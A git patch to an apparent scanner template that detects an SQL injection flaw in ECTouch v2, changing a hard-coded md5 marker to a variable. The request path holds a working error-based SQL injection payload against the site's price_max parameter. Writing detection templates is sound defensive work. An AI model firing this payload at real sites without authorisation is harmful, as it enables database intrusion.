From 9ecfdf9a0ad173ac973b177c26d4b99bb1d1481e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 30 Jun 2022 08:35:53 +0530
Subject: [PATCH] Update etouch-v2-sqli.yaml

---
 vulnerabilities/other/etouch-v2-sqli.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml
index 4983e47bcb..93efc456c6 100644
--- a/vulnerabilities/other/etouch-v2-sqli.yaml
+++ b/vulnerabilities/other/etouch-v2-sqli.yaml
@@ -9,10 +9,13 @@ info:
     - https://www.anquanke.com/post/id/168991
   tags: etouch,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
+      - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
 
     matchers-condition: and
     matchers:
@@ -22,5 +25,5 @@ requests:
 
       - type: word
         words:
-          - "c4ca4238a0b923820dcc509a6f75849b"
+          - '{{md5({{num}})}}'
         part: body